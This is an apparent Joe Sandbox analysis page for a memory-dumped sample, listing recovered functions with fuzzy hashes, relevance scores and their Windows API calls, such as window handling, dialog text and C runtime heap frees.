Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9789b29ce189c47e11f79d3f47c4af3f176f12b28a23fe709248d4240fff93bc
Instruction ID: 9b36ee5024de9c3084c2390a4da3b8350932232d56e14c63a606dfc6cf84b8f6
Opcode Fuzzy Hash: 9789b29ce189c47e11f79d3f47c4af3f176f12b28a23fe709248d4240fff93bc
Instruction Fuzzy Hash: EEA00270602241DFDB44CF39AF8D74D3BEDBA656D1709436AB509C9170EF3496A1AB01

Uniqueness

Uniqueness Score: -1.00%

Function 008962CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: a8c5810335524253a7e06320324b9461651498507d3a6552924e87b98b993e17
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 8262B3716047889FCF25DF28C8906B9BBE1FF95304F08896DE89ACB346E634E955CB11

Uniqueness

Uniqueness Score: -1.00%

Function 008977EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 65899da2231785b746762e2bcfdd63590d1d5d2e57f69c51c676d6acb2e81242
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: 8862A1716187898FCF19DF28C8809A9BBE1FF95304F1C896DE89ACB346D630E945CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0088F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 2dde91d3eab7fd13303090221f26e77c1d06b89206d2e0484e99812e792f12ab
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: E0523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00897153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
Instruction ID: 2f8b47aaac070bef61a96ff0f5d5dc41f205828faf966684a6557fc98d7e76e5
Opcode Fuzzy Hash: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
Instruction Fuzzy Hash: 2812C2B16287069FCB18DF28C490A79B7E0FF94308F18492EE997C7781E334A995DB45

Uniqueness

Uniqueness Score: -1.00%

Function 0088C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
Instruction ID: f78f6486fa5e7c869e1dbd397f83aea012e131a6daa1cdc6f03c03212f471dd9
Opcode Fuzzy Hash: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
Instruction Fuzzy Hash: 3FF19E716083058FC754EF28C88462ABBE5FFDA318F144A6EF485D725AE730E945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00896CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
Instruction ID: 61a0348beb2082d093df73795647173bbd532f28b39ae07a93455ad718133243
Opcode Fuzzy Hash: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
Instruction Fuzzy Hash: D8D19FB1A083458FDF14EF28C88475ABBE1FF89308F18456DE889DB242E774E915CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0088E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1188c6ec15abfd7918736f612090a21ca3c66ea883abf3c4ff184bb2283a64e4
Instruction ID: 8495b790ddad6b7f9abf3c24d8c1395f094e7610984e64d0f9358e8537c4866d
Opcode Fuzzy Hash: 1188c6ec15abfd7918736f612090a21ca3c66ea883abf3c4ff184bb2283a64e4
Instruction Fuzzy Hash: D9E137755083948FC704CF29D89086ABFF0BF9A300F49096EF9D497352D235EA59DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00894088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 435807c62f4d3b8a31eecc9713bbdd0a98a3e6b6b5e0f707a0afbb3cc3de8587
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: EC9126B02003499BDF28FBA8D895FBA77D5FB90304F18092DF596C72C2EA649946C752

Uniqueness

Uniqueness Score: -1.00%

Function 008943BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: c6271c3063be87a00b3108a5ec4615db25bffbba495ada4cb10513c070b3e9d8
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 1C812DB13043455BEF29FEA8C891FBD37D4FB95308F08193DE586CB282DA6089878756

Uniqueness

Uniqueness Score: -1.00%

Function 008A51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a214a28a4d7c93a9dfa2e98523c171dcce611877c2a0a39279c6f9c005a501b5
Instruction ID: efa12f2fe6679b58a7fa73dff33683fa4b8ff2067f0aacffb165661253e6f4e2
Opcode Fuzzy Hash: a214a28a4d7c93a9dfa2e98523c171dcce611877c2a0a39279c6f9c005a501b5
Instruction Fuzzy Hash: DE617A71600F0867FF389A6CA8957BE6394FB83754F140519E583DFF82D6A1DDC28216

Uniqueness

Uniqueness Score: -1.00%

Function 008A4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 0fc047e425da2eb02cd4ad042e47afb2f4f96de632632bbc0f7434fa77edee22
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 77513461200E485BFF3446288556BBF7385FB43304F182819E982CBE82DA85EDC583A6

Uniqueness

Uniqueness Score: -1.00%

Function 0088EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5808dad063622eb4b25f58ff1734f70e34137da536e626100cd8790671278cb5
Instruction ID: aa24e2fb04271193cb7f03d85f0c7e86a98c517cb8ea04f0732167b89ae11610
Opcode Fuzzy Hash: 5808dad063622eb4b25f58ff1734f70e34137da536e626100cd8790671278cb5
Instruction Fuzzy Hash: 9951E1755083D58FC712EF28C1444AEBFE0FEDA314F4909ADE5D99B243D221DA4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 008900B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fa54679f82bf92001250b0c42cc868e23cffe4acd035a5fe11baed7aca35e9
Instruction ID: cfafbba012ab419d7474a356b423ac7cb966b534e8a2f5573028be465cd5f879
Opcode Fuzzy Hash: d4fa54679f82bf92001250b0c42cc868e23cffe4acd035a5fe11baed7aca35e9
Instruction Fuzzy Hash: 2551D0B1A087159FC748CF19D88055AF7E1FF88314F058A2EE899E3740D734E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00893E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: a5239d6fd1adf56b47e8a4045cfbae8abe37bd672ef98e8cd5a996f76f2144ae
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: E231E7B1A147468FCB18EF28C85116EBBE0FB95304F14452DE495D7741CB35EA0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0088E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0088E30E

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4

_strlen.LIBCMT ref: 0088E32F
SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
GetWindowRect.USER32(?,?), ref: 0088E3C9
GetClientRect.USER32(?,?), ref: 0088E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0088E475
GetWindowRect.USER32(?,?), ref: 0088E4A2
SetWindowTextW.USER32(?,?), ref: 0088E4DB
GetSystemMetrics.USER32(00000008), ref: 0088E4E3
GetWindow.USER32(?,00000005), ref: 0088E4EE
GetWindowRect.USER32(00000000,?), ref: 0088E51B
GetWindow.USER32(00000000,00000002), ref: 0088E58D

Strings

$%s:, xrefs: 0088E302
d, xrefs: 0088E3F5
CAPTION, xrefs: 0088E4BD

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
Instruction ID: 8d483ac0a403a70fae4a8a48fa61079cba1403006fbea7b6e30ccef5ec922c93
Opcode Fuzzy Hash: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
Instruction Fuzzy Hash: 2C818172208341AFD710EFA8CD89A6FBBE9FB89704F04091DFA85D7250D675ED058B52

Uniqueness

Uniqueness Score: -1.00%

Function 008ACB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008ACB66

Part of subcall function 008AC701: _free.LIBCMT ref: 008AC71E
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC730
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC742
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC754
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC766
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC778
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC78A
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC79C
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7AE
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7C0
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7D2
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7E4
Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7F6

_free.LIBCMT ref: 008ACB5B

Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4

_free.LIBCMT ref: 008ACB7D
_free.LIBCMT ref: 008ACB92
_free.LIBCMT ref: 008ACB9D
_free.LIBCMT ref: 008ACBBF
_free.LIBCMT ref: 008ACBD2
_free.LIBCMT ref: 008ACBE0
_free.LIBCMT ref: 008ACBEB
_free.LIBCMT ref: 008ACC23
_free.LIBCMT ref: 008ACC2A
_free.LIBCMT ref: 008ACC47
_free.LIBCMT ref: 008ACC5F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
Instruction ID: 804a664a848bb88e5bdf5d366209abf5fe854f69ed4d29a6b9920f215fb4be87
Opcode Fuzzy Hash: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
Instruction Fuzzy Hash: A3314B71600205DFFB20AA3DD846B9AB7E9FF12360F105429E298D7A92DF71EC41CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0089D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0089D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0089D6ED

Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0089D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0089D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0089D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0089D75D
DeleteObject.GDI32(00000000), ref: 0089D764
GetWindow.USER32(00000000,00000002), ref: 0089D76D

Strings

STATIC, xrefs: 0089D6F3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
Instruction ID: 15ebadff890a87e9013cc79f6ddb396d5477435d85942dd5972b7a83eaae9188
